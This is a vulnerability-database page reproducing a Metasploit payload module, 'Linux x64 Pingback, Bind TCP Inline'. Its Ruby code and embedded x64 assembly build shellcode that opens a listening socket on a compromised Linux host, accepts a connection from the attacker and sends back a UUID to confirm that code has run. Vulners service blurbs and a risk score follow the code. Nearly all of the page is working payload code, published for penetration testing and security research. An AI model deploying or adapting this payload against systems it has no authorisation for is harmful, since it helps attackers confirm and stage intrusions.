Vulners
Lucene search
Linux x64 Pingback, Bind TCP Inline
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 109
include Msf::Payload::Linux::X64::Prepends
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux x64 Pingback, Bind TCP Inline',
'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
'Author' => [ 'bwatters-r7' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::Pingback
))
def generate(opts={})
# 22 -> "0x00,0x16"
# 4444 -> "0x11,0x5c"
encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
asm = %Q^
push rsi
push rax
;SOCKET
push 0x29
pop rax
cdq
push 0x2
pop rdi
push 0x1
pop rsi
syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test rax, rax
js failed
xchg rdi, rax
mov rcx, #{encoded_host_port}
push rcx
mov rsi, rsp
push rsp
pop rsi ; store pointer to struct
bind_call:
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
; rdi -> fd already stored in rdi
; rsi -> pointer to sockaddr_in6 struct already in rsi
push 0x31
pop rax ; bind syscall
push 0x10 ; sockaddr length
pop rdx ;
syscall
listen_call:
; int listen(int sockfd, int backlog);
; rdi -> fd already stored in rdi
push 0x32
pop rax ; listen syscall
push 0x1
pop rsi ; backlog
syscall
accept_call:
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
; rdi -> fd already stored in rdi
push 0x2b
pop rax ; accept syscall
cdq ; zero-out rdx via sign-extension
push rdx
push rdx
push rsp
pop rsi ; when populated, client will be stored in rsi
push 0x1c
lea rdx, [rsp] ; pointer to length of rsi (16)
syscall
xchg rdi, rax ; grab client fd
send_pingback:
; sys_write(fd:rdi, buf*:rsi, length:rdx)
push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
pop rdx ; length in rdx
call get_uuid_address ; put uuid buffer on the stack
db #{uuid_as_db} ; PINGBACK_UUID
get_uuid_address:
pop rsi ; UUID address into rsi
xor rax, rax ; sys_write = offset 1
inc rax ; sys_write = offset 1
syscall ; call sys_write
failed:
push 0x3c
pop rax
push 0x1
pop rdi
syscall ; exit(1)
^
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2025 14:31Current
7.3High risk
Vulners AI Score7.3